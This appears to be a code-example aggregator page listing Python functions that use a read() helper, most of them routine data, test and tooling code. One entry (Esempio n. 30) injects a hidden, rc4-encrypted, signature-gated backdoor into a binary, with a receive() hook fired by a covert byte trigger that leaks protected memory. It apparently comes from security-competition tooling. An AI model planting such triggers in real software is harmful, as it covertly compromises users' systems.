Esempio n. 1
0
def getDataAndLabels():
    """Return [data, labels], preferring the pickle cache over the raw .npy files.

    On a cache miss the raw numpy files are loaded and the cache repopulated.
    Labels are always passed through transformLabels before returning.
    """
    cached_data = read(DATA_PICKLE)
    cached_labels = read(LABELS_PICKLE)
    if cached_data is None or cached_labels is None:
        # Cache miss: fall back to the raw numpy files and repopulate the cache.
        cached_data = np.load(DATA_FILE)
        cached_labels = np.load(LABELS_FILE)
        save(cached_data, DATA_PICKLE)
        save(cached_labels, LABELS_PICKLE)
    return [cached_data, transformLabels(cached_labels)]
Esempio n. 2
0
def getDataAndLabels():
    """Return [data, labels], rebuilding them from the `files` map on a cache miss."""
    data = read(DATA_PATH)
    labels = read(LABELS_PATH)
    if data is None or labels is None:
        # Accumulate data/labels across every directory/index pair.
        for directory in files:
            for idx in files[directory]:
                data, labels = doStuff(directory, idx, data, labels)
        save(data, DATA_PATH)
        save(labels, LABELS_PATH)
    return [data, transformLabels(labels)]
Esempio n. 3
0
def main():
    """Train an SVM text-classification pipeline on the train split, persist it,
    and print accuracy on the develop split.
    """
    train = read("train.rd")
    develop = read("develop.rd")

    # Bag-of-words counts -> tf-idf weighting -> SVM classifier.
    text_clf = Pipeline([('vect', CountVectorizer()),
                         ('tfidf', TfidfTransformer()), ('clf', SVC())])

    text_clf = text_clf.fit(train.features[0], train.labels)

    # Persist the fitted pipeline before evaluating.
    write("model.rd", text_clf)

    predicted = text_clf.predict(develop.features[0])

    # Fix: `print x` is Python-2-only syntax; print() is valid on 2 and 3.
    print(np.mean(predicted == develop.labels))
Esempio n. 4
0
def checkpath(path, structure):
    """Recursively assert that `path` matches the expected `structure` spec.

    `structure` keys: 'files' maps expected file names to sub-structures,
    'allFile' applies one sub-structure to every entry, 'includesIndex'
    requires a valid index file listing the directory contents.  Leaf files
    are checked by extension-specific assert functions from `assertsByExt`.
    (Assertion messages are user-facing and intentionally left in Hungarian.)
    """
    expectedFiles = structure.get('files')
    expectedAllFile = structure.get('allFile')
    print('checking', path)
    # PEP 8: compare against None with `is`/`is not`, not equality.
    if expectedAllFile is not None or expectedFiles is not None:
        files = set(os.listdir(path))
        if structure.get('includesIndex'):
            files.remove(config.indexFileName)
            indexedFiles = util.readlines(
                os.path.join(path, config.indexFileName))
            # Every line except the last must be non-empty.
            for line in indexedFiles:
                assert line[
                    0] != '\n', 'Az .index fájl az utolsó sor kivételével nem tartalmazhat üres sorokat!'
            assert indexedFiles[-1][
                -1] == '\n', 'Az .index fájl utolsó sora egy üres sor kell hogy legyen! (most ez "' + indexedFiles[
                    -1] + '")'
            # `entry` instead of `file` to avoid shadowing the builtin.
            indexedFiles = set(
                entry.rstrip('\n') for entry in indexedFiles if entry != '\n')
            assert files == indexedFiles, 'Az .index fájl tartalma invalid!'
        else:
            assert config.indexFileName not in files, 'Ennek a könyvtárnak nem lehet .index fájlja!'
        if expectedAllFile is not None:
            for name in files:
                checkpath(os.path.join(path, name), expectedAllFile)
        elif expectedFiles is not None:
            expectedFileSet = set(expectedFiles.keys())
            assert expectedFileSet == files, 'Ennek a könytárnak pontosan ezen fájlokat kell tartalmaznia: ' + str(
                expectedFileSet)
            for name in files:
                checkpath(os.path.join(path, name), expectedFiles[name])
    else:
        _, ext = os.path.splitext(path)
        assertByExt = assertsByExt.get(ext)
        if assertByExt is not None:
            assertByExt(util.read(path), structure)
Esempio n. 5
0
File: app.py Progetto: uzak/reftest
    def check(self, name):
        """In save mode, record the current source as the reference for `name`;
        otherwise diff it against the stored reference and record the result.
        """
        data = self.getSource()
        fnRef = self.fnRef(name)
        fnOrig = self.fnOrig(name)

        if self.save:
            # Save-references mode: just persist the current output and stop.
            util.mkdir(self.config.REF_DIR)
            util.write(fnRef, data)
            return

        # Compare mode: a reference must already exist.
        assert os.path.exists(fnRef), "Cannot compare without reference file: %s" % fnRef

        util.mkdir(self.outputDir)
        # Keep an untouched copy of the original output before cleanup.
        util.write(fnOrig, data)

        ref = self.cleanup(util.read(fnRef))
        data = self.cleanup(data)

        # htmldiff comparison drives the recorded pass/fail result.
        html_result = htmldiff.htmldiff(ref, data, True)
        util.write(self.fnHtmlDiff(name), html_result)
        self.scenario.results[name] = self._eval_diff(html_result)

        # difflib side-by-side report, for human inspection.
        report = difflib.HtmlDiff(wrapcolumn=80).make_file(
            ref.splitlines(), data.splitlines(), fnRef, fnOrig, context=True)
        util.write(self.fnDiffLib(name), report)
Esempio n. 6
0
def main():
    """Vectorize the raw train/develop/test splits, wrap each in a Record,
    and persist them as .rd files for the training/evaluation scripts.
    """
    train_raw = read("train.raw")
    develop_raw = read("develop.raw")
    test_raw = read("test.raw")

    train_data, train_labels = vectorize(train_raw)
    develop_data, develop_labels = vectorize(develop_raw)
    test_data, test_labels = vectorize(test_raw)

    # Fixed local-variable typo: 'recrod' -> 'record'.
    train_record = Record(features(train_data), train_labels)
    develop_record = Record(features(develop_data), develop_labels)
    test_record = Record(features(test_data), test_labels)

    write("train.rd", train_record)
    write("develop.rd", develop_record)
    write("test.rd", test_record)
Esempio n. 7
0
def write_to_csv(apk_paths):
    """Append one row per APK to saurabh_dataset.csv.

    Each row is a 0/1 flag per permission in the global `list_of_permissions`,
    followed by the package name, the file size, and a constant class label.
    """
    for file_path in apk_paths:
        # Fix: the original parsed each APK twice (`APK(file_path)` then
        # immediately `APK(read(file_path), raw=True)`); the first parse was
        # dead work and is removed.
        obj = APK(read(file_path), raw=True)

        obtained = set(obj.get_permissions())

        # One 0/1 flag per known permission, in the fixed global order.
        result = [1 if permission in obtained else 0
                  for permission in list_of_permissions]

        result.append(obj.get_package())
        result.append(obj.file_size)
        # NOTE(review): constant trailing 1 — presumably the class label for
        # this dataset partition; confirm against the dataset convention.
        result.append(1)

        with open("./saurabh_dataset.csv", "a") as f:
            csv.writer(f, dialect='excel').writerow(result)
Esempio n. 8
0
    def test_read(self):
        """
        Test if app can get a single item by ID
        """
        first = create(self, 'Write app tests')
        second = create(self, 'Write automation tests', completed=True)

        assert read(self, first['id']) == first
        assert read(self, second['id']) == second

        # An ID past the last created item must not resolve.
        assert read(self, second['id'] + 1) is None
def getDataAndLabels():
    """Return [data, labels], assembling them per subject file and caching the result."""
    data = read(DATA_PATH)
    labels = read(LABELS_PATH)
    filenames = getFileNames()
    if data is None or labels is None:
        data = None
        collected = []
        for filename in filenames:
            subjectData, subjectLabels = getDataAndLabelsForSubject(filename)
            # Stack subjects along the last axis.
            if data is None:
                data = subjectData
            else:
                data = np.concatenate([data, subjectData], axis=-1)
            collected = collected + subjectLabels
        labels = np.array(collected)
        save(data, DATA_PATH)
        save(labels, LABELS_PATH)
    return [data, labels]
Esempio n. 10
0
def index():
    """Render the dashboard page with per-label document counts and time-series data."""
    counts = {
        label: collection.find({"label": label}).count()
        for label in ("Fake", "Real")
    }

    return render_template("index.html",
                           message="Dashboard",
                           timeseries=util.read(),
                           fake_count=counts["Fake"],
                           real_count=counts["Real"])
def getDataAndLabels():
    """Return [data, labels] from the pickle cache, rebuilding it from every
    subject/session pair on a cache miss.
    """
    data = read(DATA_PICKLE)
    labels = read(LABELS_PICKLE)
    if data is None or labels is None:
        for subject in files:
            for session in files[subject]:
                sessionData = getData(subject, session)
                sessionLabels = getLabels(subject, session)
                # First session seeds the arrays; later ones are concatenated.
                data = sessionData if data is None else np.concatenate(
                    [data, sessionData])
                labels = sessionLabels if labels is None else np.concatenate(
                    [labels, sessionLabels])
        save(data, DATA_PICKLE)
        save(labels, LABELS_PICKLE)
    return [data, transformLabels(labels)]
Esempio n. 12
0
 def __init__(self, chips, alpha, gamma, agent):
     """Initialize a learning player.

     chips: starting chip count, forwarded to the Player base class.
     alpha: learning rate; gamma: discount factor; agent: agent type constant
     that selects which persisted table (weights vs. Q-values) to load.
     """
     Player.__init__(self, chips)
     self.gamma = gamma
     self.alpha = alpha
     self.agent = agent
     # Read in the table if it exists, otherwise create a new one
     if self.agent == Constants.APPROXIMATE:
         if os.path.exists(Constants.WFILE):
             # NOTE(review): existence is checked on Constants.WFILE but the
             # read is keyed on self.agent — confirm util.read's contract.
             self.weights = util.read(self.agent)
             self.values = defaultdict()
         else:
             self.weights = defaultdict(float)
             self.values = defaultdict()
     else:
         if os.path.exists(Constants.QFILE):
             self.values = util.read(self.agent)
         else:
             self.values = defaultdict(float)
     self.eval = Evaluator()
Esempio n. 13
0
def load_map(name):
    """Load map `name`: parse its tile definitions from the _info.txt file,
    then render three map layers onto surfaces appended to the module-level
    `map` list (layer 1 is flagged, presumably as the collision layer —
    TODO confirm against Map's constructor).
    """
    file = util.read("{}{}_info.txt".format(util.MAPS_FOLDER, name))
    tiles = {}
    for line in file:

        if line.startswith("#"):
            continue

        # Define keyword
        # Defines a map char to a tile coordinate on the sprite sheet,
        # and determines whether to collide or not
        def_match = re.match(DEF_PATTERN, line)

        if def_match:
            # NOTE(review): `clip` is computed but never used in this function.
            clip = def_match.group(1) != "^"
            char = def_match.group(2)
            sheet = def_match.group(3)
            sheet_x = int(def_match.group(4))
            sheet_y = int(def_match.group(5))

            # Cut the tile image out of the sprite sheet.
            rect = pygame.Rect(sheet_x * TILE_SIZE, sheet_y * TILE_SIZE,
                               TILE_SIZE, TILE_SIZE)
            tiles[char] = util.get_sheet(
                "tile\\{}.png".format(sheet)).get_image(rect)

    # Render each of the three layer files onto its own surface.
    for i in range(3):
        text_map = util.read("{}{}_map_layer{}.txt".format(
            util.MAPS_FOLDER, name, i))
        map_surface = pygame.Surface(
            (len(text_map[0]) * TILE_SIZE, len(text_map) * TILE_SIZE))
        # Pure blue is used as the transparent colorkey.
        map_surface.fill((0, 0, 255))
        map_surface.set_colorkey((0, 0, 255), pygame.RLEACCEL)

        x = y = 0
        for line in text_map:
            for char in line:
                if char != " ":
                    map_surface.blit(tiles[char], (x, y))
                x += TILE_SIZE
            y += TILE_SIZE
            x = 0
        map.append(Map(i == 1, map_surface))
Esempio n. 14
0
  def get(obj, start_byte, end_byte, identifier=""):
    """Read bytes [start_byte, end_byte) of `obj` and split them into
    percolator-format lines.

    With identifier == "q-value", blank lines are dropped and each line is
    paired with its parsed q-value; any other non-empty identifier raises.
    """
    content = util.read(obj, start_byte, end_byte)
    lines = list(content.split(tsv.Iterator.IDENTIFIER))

    if identifier == "q-value":
      # Drop blank lines, then tag each remaining line with its q-value.
      lines = list(filter(lambda line: len(line.strip()) > 0, lines))
      lines = list(map(lambda line: (Iterator.getQValue(line), line), lines))
    elif identifier != "":
      raise Exception("Unknown identifier for percolator format", identifier)

    return lines
Esempio n. 15
0
def generate_item(category):
    """Create a random Item of the given category.

    A kind is picked at random from the category's constructor template, and
    the item's name is drawn from the name file at the category location plus
    the kind-specific location suffix.
    """
    item = Item()
    item.category = category

    template = util.load_constructor()[category]
    base_location = template.pop("location")

    item.kind = selector.pick_random(template)
    kind_template = template[item.kind]

    # Name list lives at the combined category + kind path.
    candidates = util.read(base_location + kind_template["location"]).split("\n")
    item.name = selector.pick_random(candidates)
    return item
Esempio n. 16
0
def stage(relpath, add_to=True):
    """Stage `relpath` into (add_to=True) or remove it from (add_to=False) the index.

    Index entries are (blob_hash, rel_path, mtime, size) tuples; the index is
    rewritten sorted by rel_path.
    """
    ri = read_index()

    # find the first instance of relpath
    ridx = next((i for i, j in enumerate(ri) if j[1] == relpath), None)

    # index structure
    # blob_hash, rel_path, mtime, size
    if add_to:
        bs = wstat(relpath)
        # file is already in the index, it might need to be updated with a new blob, and stats
        if ridx is not None:

            # Fix: the original tested `ri[ridx][2] != bs[0]` twice; compare
            # mtime AND size against the working-tree stat.
            if ri[ridx][2] != bs[0] or ri[ridx][3] != bs[1]:
                bc = read(relpath)
                bh = hashbuf(bc)

                # if the blob does not already exists, then create, otherwise, reuse
                if not exists(bh):
                    objects.write(bh, bc)

                ri[ridx] = (bh, relpath, bs[0], bs[1])
        else:
            bc = read(relpath)
            bh = hashbuf(bc)

            # if the blob does not already exists, then create, otherwise, reuse
            if not exists(bh):
                objects.write(bh, bc)
            ri.append((bh, relpath, bs[0], bs[1]))
    # bvc stage rm relpath
    # remove the file from working directory and remove from index
    else:
        if ridx is not None:
            delete(relpath)
            del ri[ridx]

    # sort the index
    sri = sorted(ri, key=lambda x: x[1])
    write_index(sri)
Esempio n. 17
0
def load():
    """Populate the module-level scam data: scam list, per-scam classifiers,
    responses, default responses, and the previously-contacted set.
    """
    global scams, classifiers, responses, default, contacted
    scams = [scam for scam in listdir('scams') if isdir(('scams/%s' % scam))]
    classifiers = dict([(scam, classifier(scam)) for scam in scams])
    responses = [(scam, load_responses(scam)) for scam in scams]
    default = read('scams/responses').split('###')
    try:
        # Fix: `with` guarantees the handle is closed even if pickle.load raises.
        with open('data/contacted', 'r') as contactFile:
            contacted = pickle.load(contactFile)
    except IOError:
        pass  # data/contacted doesn't yet exist, leave contacted as empty set
Esempio n. 18
0
File: data.py Progetto: jamii/scampy
def load():
  """Populate the module-level scam data: scam list, per-scam classifiers,
  responses, default responses, and the previously-contacted set.
  """
  global scams, classifiers, responses, default, contacted
  scams = [scam for scam in listdir('scams') if isdir(('scams/%s' % scam))]
  classifiers = dict( [(scam, classifier(scam)) for scam in scams] )
  responses = [(scam, load_responses(scam)) for scam in scams]
  default = read('scams/responses').split('###')
  try:
    # Fix: `with` guarantees the handle is closed even if pickle.load raises.
    with open('data/contacted', 'r') as contactFile:
      contacted = pickle.load(contactFile)
  except IOError:
    pass # data/contacted doesnt yet exist, leave contacted as empty set
Esempio n. 19
0
    def test_read(self):
        """
        Test if API can get a single item by ID
        """
        payload = {"title": 'Write API tests',
                   "order": self.order,
                   "user_id": 1}
        created = create(self, url='/api', inp=payload)

        # Reading the item back must reproduce it exactly.
        assert read(self, created['id'], url='/api') == created
Esempio n. 20
0
def load_map(name):
    """Load map `name`: parse its tile definitions from the _info.txt file,
    then render three map layers onto surfaces appended to the module-level
    `map` list (layer 1 is flagged, presumably as the collision layer —
    TODO confirm against Map's constructor).
    """
    file = util.read("{}{}_info.txt".format(util.MAPS_FOLDER, name))
    tiles = {}
    for line in file:

        if line.startswith("#"):
            continue

        # Define keyword
        # Defines a map char to a tile coordinate on the sprite sheet,
        # and determines whether to collide or not
        def_match = re.match(DEF_PATTERN, line)

        if def_match:
            # NOTE(review): `clip` is computed but never used in this function.
            clip = def_match.group(1) != "^"
            char = def_match.group(2)
            sheet = def_match.group(3)
            sheet_x = int(def_match.group(4))
            sheet_y = int(def_match.group(5))

            # Cut the tile image out of the sprite sheet.
            rect = pygame.Rect(sheet_x * TILE_SIZE, sheet_y * TILE_SIZE, TILE_SIZE, TILE_SIZE)
            tiles[char] = util.get_sheet("tile\\{}.png".format(sheet)).get_image(rect)

    # Render each of the three layer files onto its own surface.
    for i in range(3):
        text_map = util.read("{}{}_map_layer{}.txt".format(util.MAPS_FOLDER, name, i))
        map_surface = pygame.Surface((len(text_map[0]) * TILE_SIZE, len(text_map) * TILE_SIZE))
        # Pure blue is used as the transparent colorkey.
        map_surface.fill((0, 0, 255))
        map_surface.set_colorkey((0, 0, 255), pygame.RLEACCEL)

        x = y = 0
        for line in text_map:
            for char in line:
                if char != " ":
                    map_surface.blit(tiles[char], (x, y))
                x += TILE_SIZE
            y += TILE_SIZE
            x = 0
        map.append(Map(i == 1, map_surface))
Esempio n. 21
0
def declare(linker):
    """Declare the stdlib C sources and symbols with the linker.

    The '_terminate' symbol doubles as a guard so repeated calls do not
    re-declare the same sources.
    """
    # Fix: `x not in y` is the idiomatic form of `not x in y`.
    if '_terminate' not in linker:
        linker.declare(headers=headers)
        linker.autodecl(read('stdlib/libc.c'))
        linker.autodecl(read('stdlib/syscalls.c'))
        linker.autodecl(read('stdlib/ctype.c'))
        linker.autodecl(read('stdlib/string.c'))
        linker.autodecl(read('stdlib/chk.c'))
        # stdarg is needed by the io helpers declared next.
        linker.declare(headers='#include <stdarg.h>')
        linker.autodecl(read('stdlib/io.c'))
        linker.declare(symbols={
            'itoa': 'char *itoa(unsigned int i, int base)',
            'atoi': 'int atoi(char *str)',
        }, source=read('stdlib/num.c'))
Esempio n. 22
0
def make_branch(name):
    """Create branch `name`: record a root commit parented on the current head
    and write the branch ref file. No-op if the branch already exists.
    """
    branch_path = os.path.join('.bvc', 'branches', name)
    # prevent a branch from creating if it already exists
    if util.exists(branch_path):
        return

    cc = refs.head()
    hh = util.read(os.path.join('.bvc', 'HEAD')).strip()

    # create a new commit that serves as the root of the branch
    cb = "%s\t%s\t%s" % (cc[0], time.time(), 'Create branch: ' + name)
    ch = filespace.hashbuf(cb)
    objects.write(ch, cb)

    # update the ref log
    refs.append(ch)

    # creates the branches file
    util.write(branch_path, ch + os.linesep)
Esempio n. 23
0
    def test_update(self):
        """
        Test if app can update order of a todo item by ID
        """
        original = create(self, 'Write app tests')
        todo_id = original['id']

        # Expected state after the update.
        expected = dict(original,
                        completed=True,
                        title='Write all app tests')

        response = self.client.put(
            '/todos/%d' % todo_id,
            data=json.dumps(expected),
            content_type='application/json')

        assert json.loads(response.data) == expected
        assert read(self, todo_id) == expected
Esempio n. 24
0
def global2local(csvfile, bvhfile):
    """Convert global joint transforms from `csvfile` into local (parent-relative)
    transforms, using the joint hierarchy from `bvhfile`, and write them to
    <csvfile>_local.csv.

    The CSV is assumed to hold 7 values per joint per frame
    (quaternion x,y,z,w then translation) — TODO confirm column layout.
    """
    data, header = read(csvfile)
    animation, _, joints, joints_structure, _ = read_bvh(bvhfile)
    # Reshape flat rows into (frames, joints, 7).
    data = data.reshape(data.shape[0], int(data.shape[1] / 7), 7)

    Ts = []
    joint_names = []
    for i in range(0, data.shape[1]):
        quaternions = data[:, i, 0:4]
        # Reorder from (x, y, z, w) to (w, x, y, z).
        quaternions = np.concatenate(
            [quaternions[:, [-1]], quaternions[:, :3]], axis=1)
        translations = data[:, i, 4:]
        Ts += [get_transforms(translations, quaternions)]
        # Header columns are suffixed (e.g. "_qx"); strip the suffix.
        joint_names += [header[i * 7][:-3]]
    local_Ts = []

    # Root joint keeps its global transform; all others become parent-relative.
    for joint in joints[1:]:
        if joint.startswith("End"):
            continue
        print(joint)
        parent_joint = joint_names.index(
            get_parent(joint, joints, joints_structure))
        local_Ts += [
            get_local_transform(parent_Ts=Ts[parent_joint],
                                Ts=Ts[joint_names.index(joint)])
        ]
    transform = to_quaternions(local_Ts)

    local_transforms = np.concatenate(transform, axis=1)
    transforms = np.concatenate([data[:, 1], local_transforms], axis=1)

    joints = [j for j in joints if not j.startswith("End")]
    header = create_header(joints)
    # Fix: removed a dead loop that appended empty lists to `header` (no-op).

    np.savetxt(csvfile[:-4] + "_local.csv",
               transforms,
               fmt='%10.5f',
               delimiter=",",
               header=",".join(header),
               comments="")
Esempio n. 25
0
    def test_update(self):
        """
        Test if API can update order of a todo item by ID
        """
        payload = {"title": 'Write API tests',
                   "order": self.order,
                   "user_id": 1}
        created = create(self, url='/api', inp=payload)

        response = self.client.put(
            '/api/todos/%d' % created['id'],
            data={'order': 2},
            content_type='application/json')

        # The stored item reflects the new order and the API replies 204.
        assert read(self, created['id'], url='/api')['order'] == 2
        assert response.status_code == 204
Esempio n. 26
0
def detectpattern(path,savepath,min_supp=0.05):
    """Mine sequential patterns from the sequences in `path` with PrefixSpan
    and write the maximal sequences, one per line, to `savepath`.

    NOTE: Python 2 code (`sys.maxint`, `print >>` statements).
    min_supp is the minimum support as a fraction of the sequence count.
    """
    ff=open(savepath,'w')
    S=u.read(path)
    # Count the sequences to turn the fractional support into an absolute one.
    count = 0
    for each in S:
        count += 1
    patterns = prefixSpan(SquencePattern([], sys.maxint), S, min_supp * count)
    #print_patterns(patterns)
    seqNums = []
    for each in patterns:
        seqNums.append(each.squence)
    # Keep only maximal sequences (not contained in any longer one).
    maxSeqs = u.maxSeq(seqNums)
    for i in maxSeqs:
        for sth in i:
            #print >> ff,"[",
            for ssth in sth:
                print >> ff,ssth,
            #print >> ff,"]",
        print >> ff,""
    ff.close()
Esempio n. 27
0
    def allowed_sections(self):
        """Parse the 'allowed' file and return {section_name: value}.

        Lines starting with '#' are comments; an '@...section...' directive
        switches into section-reading mode; a blank line resets the mode.
        """
        loaded = util.read("allowed", 0)

        mode = 0
        sections = {}

        for line in loaded:
            if line.startswith('#'):
                continue
            if line.startswith('@'):
                # Directive: enable section-reading mode when it mentions 'section'.
                if line.find('section') > -1:
                    mode |= config.RF_SECTION
                continue
            if line.startswith('\n'):
                mode = 0
                continue
            if (mode & config.RF_SECTION) == config.RF_SECTION:
                parts = line.split(":")
                sections[parts[0]] = parts[1].replace("\n", "")
        return sections
Esempio n. 28
0
def restart(case_dir,iteration='current'):
    """Restore a simulation from a saved case directory and return it.

    iteration: 'current' (or any string) selects <case_dir>/<iteration>.case;
    an integer selects <case_dir>/iterNNNNNNNN.case (zero-padded to 8 digits).
    """
    if isinstance(iteration,str):
        case_iter_dir=case_dir+'/'+iteration+'.case'
    else:
        case_iter_dir=case_dir+'/iter'+str(iteration).zfill(8)+'.case'

    # Unpickle the simulation object, then rebuild the pieces that are not
    # (or cannot be) pickled: mesh, discretizations, BCs, CFL, history.
    simulation = read(case_iter_dir+'/case.p')
    log('Restarting ',case_iter_dir)
    simulation.read_mesh(case_iter_dir+'/mesh.cf3mesh')
    simulation.create_space_discretization( order = simulation.order, riemann_solver = simulation.riemann_solver )
    simulation.pde.time.current_time = simulation.begin_time
    simulation.pde.time.iteration = simulation.iteration
    # Re-register the boundary conditions through add_bc so they attach to the
    # freshly created discretization.
    bcs = simulation.bcs
    simulation.bcs = []
    for bc in bcs:
        simulation.add_bc(str(bc[0]),str(bc[1]),bc[2],**bc[3])
    simulation.set_time_discretization( type = simulation.solver_type )
    simulation.set_cfl(str(simulation.max_cfl)) # set the current cfl number
    simulation.set_cfl(str(simulation.cfl)) # set the cfl function
    simulation.set_time_accurate(simulation.time_accurate)
    simulation.solver.children.history.read(URI(case_iter_dir+'/history.tsv'))
    return simulation
Esempio n. 29
0
def main():
    """Scan a GnuCash XML file for 'assoc_uri' slots and report any attached
    files that do not exist under the given base path.
    """
    parser = argparse.ArgumentParser(
        description='Check whether all attached files are found')
    parser.add_argument('gnucash_file')
    parser.add_argument('base_path')
    args = parser.parse_args()

    doc = minidom.parseString(util.read(args.gnucash_file))

    slot_values = doc.getElementsByTagName('slot')

    file_paths = []

    for x in slot_values:
        slot_key = x.getElementsByTagName('slot:key')[0].firstChild.data

        if slot_key == 'assoc_uri':
            rel_path = request.url2pathname(
                urllib.parse.urlparse(
                    x.getElementsByTagName('slot:value')
                    [0].firstChild.data).path)

            # remove leading slashes as this breaks os.path.join
            # Fix: lstrip() replaces the `while rel_path[0] == '/'` loop, which
            # raised IndexError on an empty path.
            rel_path = rel_path.lstrip('/')

            file_paths.append(os.path.join(args.base_path, rel_path))

    print("Found {} files to search in base path '{}'...".format(
        len(file_paths), args.base_path))
    errors = [x for x in file_paths if not os.path.exists(x)]

    for e in errors:
        print("Failed to find {}...".format(e))

    print("Found {} errors in {} files!".format(len(errors), len(file_paths)))
Esempio n. 30
0
def backdoor(pt):
    """Inject a signed-handshake backdoor into the target binary via the
    patch-tool `pt`, rc4-encrypt it in place, and hook receive() so that a
    keyed trigger in the input stream decrypts and runs it.

    NOTE: Python 2 code (`xrange`, iterator `.next()`, str/bytes mixing).
    """
    # Inline tweetnacl (Ed25519 signing) plus the embedded public key.
    c = read('backdoor/tweetnacl.c')
    c = c.replace('#include "tweetnacl.h"', '')
    h = read('backdoor/tweetnacl.h')
    pubkey = read('backdoor/pubkey.h')
    randombytes = r'''
    void randombytes(uint8_t *msg, uint64_t len) {
        syscall3(SYS_random, (uint32_t)msg, len, 0);
    }
    '''

    # TODO: transmit_all / receive_all?
    # Challenge-response handshake: send a random nonce, verify the peer's
    # signature over it, and only then leak the 4 bytes at 0x4347c000.
    code = r'''
    #define NONCE_LEN 8
    #define SM_LEN 0x48
    void handshake() {
        uint8_t nonce[NONCE_LEN];
        syscall3(SYS_random, (uint32_t)nonce, NONCE_LEN, 0);
        syscall4(SYS_transmit, 1, (uint32_t)nonce, NONCE_LEN, 0);

        uint32_t smlen = SM_LEN;
        uint8_t *sm, *m;
        if (syscall3(SYS_allocate, smlen, 0, (uint32_t)&sm) ||
           (syscall3(SYS_allocate, smlen, 0, (uint32_t)&m))) {
            _terminate(1);
        }
        syscall4(SYS_receive, 0, (uint32_t)sm, smlen, 0);

        uint64_t mlen;
        int valid = crypto_sign_open(m, &mlen, sm, smlen, pubkey);
        if (valid == 0 && memcmp(m, nonce, NONCE_LEN) == 0) {
            syscall4(SYS_transmit, 1, 0x4347c000, 4, 0);
        }
        syscall1(SYS__terminate, 2);
    }
    '''

    code = h + pubkey + code + randombytes + c
    backdoor_addr, size = pt.inject(c=code, size=True)

    # rc4-encrypt the backdoor so you can't ROP directly into the type2 pov
    # this block also intercepts the receive() syscall function
    rc4_key = os.urandom(16)

    # as part of rc4-encrypting, we relocate the backdoor to the NX page so it doesn't add 1000+ ROP gadgets
    xor = rc4(rc4_key)
    data = pt.elf.read(backdoor_addr, size)
    for i in xrange(len(data)):
        data[i] ^= xor.next()
    shadow_addr = pt.inject(raw=data, target='nx', silent=True)
    pt.patch(backdoor_addr, raw=size * '\x00', silent=True)


    # xor key so they can't just pull it out of memory
    key_otp = os.urandom(len(rc4_key))
    key = ''.join([chr(ord(c) ^ ord(key_otp[i])) for i, c in enumerate(rc4_key)])
    str2c = lambda x: ', '.join(map(str, map(ord, x)))

    # Runtime stub: copy the encrypted body back, re-derive the rc4 key from
    # the OTP, decrypt in place, and jump to it.
    call_backdoor = r'''
    void call_backdoor() {
        void (*backdoor)() = (void (*)())%d;
        char *shadow_addr = (char *)%d;
        size_t bd_size = %d;
        memcpy(backdoor, shadow_addr, bd_size);

        uint8_t state[256];
        uint8_t rc4_key[] = {%s};
        uint8_t rc4_otp[] = {%s};
        int keylen = %d;
        for (int i = 0; i < keylen; i++) {
            rc4_key[i] ^= rc4_otp[i];
        }
        ksa(state, rc4_key, keylen);
        rc4(state, (uint8_t *)backdoor, bd_size);

        backdoor();
        // always exit after backdoor so there's not a decrypted type 2 POV in memory you can ROP into
        _terminate(0);
    }
    ''' % (backdoor_addr, shadow_addr, size, str2c(key), str2c(key_otp), len(key))

    # Wrapper around the original receive(): buffers the first WINDOW bytes so
    # check_init() can scan them for the trigger before handing data through.
    receive_hook_head = r'''
    void call_backdoor();
    void check_init(char *buf, uint32_t size);
    int _receive(int fd, void *buf, uint32_t size, uint32_t *count);
    #define WINDOW 9
    char bufsave[WINDOW] = {1};
    uint32_t first = 1, saved = 1, pos = 1;
    int receive(int fd, void *_buf, uint32_t size, uint32_t *count) {
        char *buf = (char *)_buf;
        // shortcut if we've run and buffer is empty, or on fd > 0
        if (fd != 0 || saved == 0) {
            return _receive(fd, buf, size, count);
        } else if (first) {
            first = 0;
            if (size < WINDOW) {
                int ret = _receive(fd, bufsave, WINDOW, &saved);
                if (ret) return ret;
                check_init(bufsave, saved);
                pos = 0;
            } else {
                int ret = _receive(fd, buf, size, &saved);
                if (ret) return ret;
                if (count) *count = saved;
                check_init(buf, saved);
                saved = 0;
                return ret;
            }
        }
        // flush buffer
        if (saved > 0 && saved < size) {
            memcpy(buf, bufsave + pos, saved);
            if (count) *count = saved;
            uint32_t tmp;
            int ret = _receive(fd, buf + saved, size - saved, &tmp);
            saved = 0;
            if (ret) return ret;
            if (count) *count += tmp;
            return ret;
        } else if (saved >= size) {
            memcpy(buf, bufsave + pos, size);
            if (count) *count = size;
            saved -= size;
            pos += size;
        }
        return 0;
    }'''
    # Trigger detector: rolling 4-byte XOR hash must match "ECAF"; on match,
    # echo the inverted trigger and fire the backdoor.
    receive_hook_tail = r'''
    void check_init(char *buf, uint32_t size) {
        if (size < 5) return;
        char hash[4];
        for (int i = 0; i < 4; i++) hash[i] = buf[i];
        char *key = "ECAF";
        for (int i = 4; i < size; i++) {
            for (int j = 0; j < 4; j++) {
                hash[j] ^= buf[i];
            }
            if (*(uint32_t *)hash == *(uint32_t *)key) {
                size = i + 1;
                // respond with inverted key so POV can seek ahead to handshake
                for (int j = 0; j < size; j++) {
                    buf[j] ^= 0xff;
                }
                transmit(1, buf, size, 0);
                call_backdoor();
            }
        }
    }
    ''' + call_backdoor

    def patch_receive(code, syms):
        # Rename the real receive() to _receive() and wrap it with the hook.
        if syms == ['receive']:
            out = []
            # TODO: this is really gross text parsing
            out.append(receive_hook_head)
            for line in code.split('\n'):
                if line.startswith('int receive(') and line.endswith('{'):
                    out.append(line.replace('int receive(', 'int _receive(', 1))
                else:
                    out.append(line)
            out.append(receive_hook_tail)
            return '\n'.join(out)

    pt.binary.linker.onpre(patch_receive)
Esempio n. 31
0
def declare(linker):
    """Register the RC4 implementation's declarations with the linker."""
    linker.autodecl(read('crypto/rc4.c'))
Esempio n. 32
0
def get_package_version(file_):
    """get version from top-level package init"""
    # NOTE(review): this returns whatever read(file_) yields in full;
    # presumably `read` itself extracts the version string — confirm
    # against read's definition.
    return read(file_)
Esempio n. 33
0
def commit(ch):
    """Load commit object `ch` and return its first line split into a tuple
    of tab-separated fields.
    """
    raw = read(os.path.join(dirpath, ch))
    first_line = raw.split('\n')[0]
    return tuple(first_line.split('\t'))
Esempio n. 34
0
def tree(th):
    """Load tree object `th` and return its non-empty lines as a list of
    tuples of tab-separated fields.
    """
    raw = read(os.path.join(dirpath, th))
    entries = [line for line in raw.split(os.linesep) if line]
    return [tuple(line.split('\t')) for line in entries]
Esempio n. 35
0
def create(pt):
    """Build the proof-of-vulnerability client for the backdoor and set it as
    the patch-tool entry point.

    The injected C program performs the trigger handshake (keyed 'ECAF'
    rolling-hash), signs the server's nonce with the embedded private key,
    and forwards the leaked 4-byte flag.
    """
